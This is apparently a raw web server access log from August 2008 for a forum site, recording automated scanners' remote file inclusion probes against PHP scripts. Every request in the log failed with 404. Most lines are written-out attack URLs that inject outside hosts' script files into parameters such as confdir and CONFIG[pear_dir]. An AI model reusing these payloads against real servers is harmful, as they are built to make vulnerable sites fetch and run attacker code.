200.126.108.198 - - [03/Aug/2008:20:33:22 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:20:33:22 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.185.237.77 - - [03/Aug/2008:20:34:45 -0700] "GET /logs/access_080121.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:20:34:58 -0700] "GET /logs/access_080609.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:20:34:58 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:20:34:58 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:27 -0700] "GET /logs/access_080414.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:31 -0700] "GET //config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:48 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:49 -0700] "GET /logs/access_080414.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:20:35:50 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:35:51 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
24.91.36.151 - - [03/Aug/2008:20:36:02 -0700] "GET /logs/access_080324.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:36:08 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:36:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:36:08 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:36:09 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:38:32 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:38:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:20:38:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.14.46.18 - - [03/Aug/2008:20:39:13 -0700] "GET /logs/access_080609.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][con